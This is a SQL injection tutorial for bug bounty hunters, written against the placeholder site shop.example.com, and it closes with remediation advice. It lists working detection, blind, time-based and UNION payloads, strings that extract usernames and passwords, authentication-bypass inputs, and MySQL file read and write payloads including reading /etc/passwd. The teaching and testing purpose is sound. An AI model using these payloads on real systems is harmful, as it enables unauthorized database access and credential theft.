A SQL injection (SQLi) vulnerability is a web security flaw that enables an attacker to interfere with the queries an application makes to its database. It occurs when an application uses unsanitized user-supplied input to dynamically construct SQL queries, allowing malicious SQL code to be executed.

sqlInjection.md

Finding a SQL Injection Vulnerability

Important Note: Always start with deliberately vulnerable applications like DVWA (Damn Vulnerable Web Application) or Web Security Academy before testing on real bug bounty programs.

Step 1: Map User Input Endpoints

Identify all locations where the application accepts user input:

Common SQLi injection points:

• URL Parameters: GET /users?id=1
• Search Fields: GET /search?query=test
• Login Forms: POST /login with username=admin&password=pass
• Filter/Sort Parameters: GET /products?category=books&sort=price
• HTTP Headers: X-Forwarded-For, User-Agent, Referer
• API Endpoints: GET /api/users/1

Example from our target https://shop.example.com:

• GET /products?id=1
• GET /search?q=laptop
• POST /login (username/password)
• GET /user/profile?user_id=1001

---

Step 2: Insert Test Payloads

Start with simple payloads to detect vulnerabilities:

Basic Detection Payloads:

'                       -- Check for errors
"                       -- Check for errors
`                       -- Check for errors
\                       -- Escape character test
1 OR 1=1                -- Boolean-based test
1' OR '1'='1            -- String-based test

Testing https://shop.example.com/products?id=1:

1. https://shop.example.com/products?id=1'
2. https://shop.example.com/products?id=1"
3. https://shop.example.com/products?id=1 OR 1=1
4. https://shop.example.com/products?id=1' OR '1'='1

Observe the responses:

• Database Errors: You have an error in your SQL syntax, MySQL server version, etc.
• Different Content: Page shows different data or behaves unexpectedly
• Time Delays: Page takes longer to load (potential time-based SQLi)

If basic payloads don't work, try inferential (Blind) SQLi:

Boolean-Based Blind SQLi:

1' AND 1=1-- -          -- Normal response expected
1' AND 1=2-- -          -- Empty/error response expected

Time-Based Blind SQLi:

1' AND SLEEP(5)-- -     -- MySQL
1' AND pg_sleep(5)-- -  -- PostgreSQL
1' WAITFOR DELAY '0:0:5'-- -  -- MSSQL

---

Step 3: Exploit and Extract Information

Once you confirm vulnerability, extract data systematically:

Determine Database Type:

1' UNION SELECT @@version-- -          -- MySQL
1' UNION SELECT version()-- -          -- PostgreSQL
1' UNION SELECT @@version-- -          -- MSSQL

Basic UNION Attacks (when you see results):

-- Find number of columns
1' ORDER BY 1-- -
1' ORDER BY 2-- -
1' ORDER BY 3-- -  -- Continue until error

-- Example: If 3 columns work
1' UNION SELECT 1,2,3-- -              -- See which columns display data

-- Extract database information
1' UNION SELECT 1,database(),user()-- -
1' UNION SELECT 1,table_name,3 FROM information_schema.tables-- -

Practical Example - Extract Users Table:

-- Get table names
1' UNION SELECT 1,table_name,3 FROM information_schema.tables WHERE table_schema=database()-- -

-- Get column names from users table
1' UNION SELECT 1,column_name,3 FROM information_schema.columns WHERE table_name='users'-- -

-- Extract data
1' UNION SELECT 1,username,password FROM users-- -

Blind SQLi Data Extraction:

-- Extract database name character by character
1' AND substring(database(),1,1)='a'-- -
1' AND substring(database(),1,1)='b'-- -

-- Or with time delays
1' AND IF(substring(database(),1,1)='a',SLEEP(5),0)-- -

---

Step 4: Escalate the Issue

Assess the impact:

• Data Extraction: Can you read user credentials, personal data, financial information?
• Authentication Bypass:

  admin' OR '1'='1'-- -
  admin'-- -
  ' OR 1=1-- -

• Database Takeover: Can you read/write files or execute commands?

  SELECT LOAD_FILE('/etc/passwd')                    -- MySQL file read
  SELECT * FROM users INTO OUTFILE '/tmp/users.txt' -- MySQL file write

Important: Never use destructive commands like DROP TABLE, DELETE, or modify production data.

---

Additional Exploitation Examples:

-- Extract table names
1' UNION SELECT 1,table_name,3,4 FROM information_schema.tables WHERE table_schema=database()-- -

-- Extract user credentials
1' UNION SELECT 1,username,password,4 FROM users-- -

Impact: An attacker can:

• Extract the entire database contents including user credentials, personal information, and business data
• Bypass authentication mechanisms
• Potentially achieve remote code execution depending on database configuration
• Compromise all user accounts and sensitive business information

Remediation Recommendations:

1. Use Parameterized Queries: Implement prepared statements with parameterized queries
2. Input Validation: Apply strict whitelist validation on all user inputs
3. Principle of Least Privilege: Ensure database users have minimal required permissions
4. Web Application Firewall: Deploy WAF rules to detect and block SQL injection attempts
5. Security Testing: Conduct regular penetration testing and code reviews

Technical Details:

• Database Type: MySQL (detected via version())
• Injection Type: Union-Based SQL Injection
• Vulnerable Parameter: id (GET parameter)

---

Essential Tools for SQL Injection:

• Manual Testing: Burp Suite, Browser Developer Tools
• Automated Scanning: SQLmap (use responsibly and only with permission!)
• Practice Environments: DVWA, Web Security Academy, HackTheBox

Pro Tips for SQLi Hunting:

• Start Simple: Begin with basic error-based detection
• Understand Context: Is it string/numeric? What's the query structure?
• Use Comments: -- -, #, /* */ to handle trailing SQL
• Test Different Entry Points: Don't just test URL parameters - test everything!
• Be Patient: Blind SQLi requires careful, methodical testing
• Document Everything: Keep detailed notes of what works and what doesn't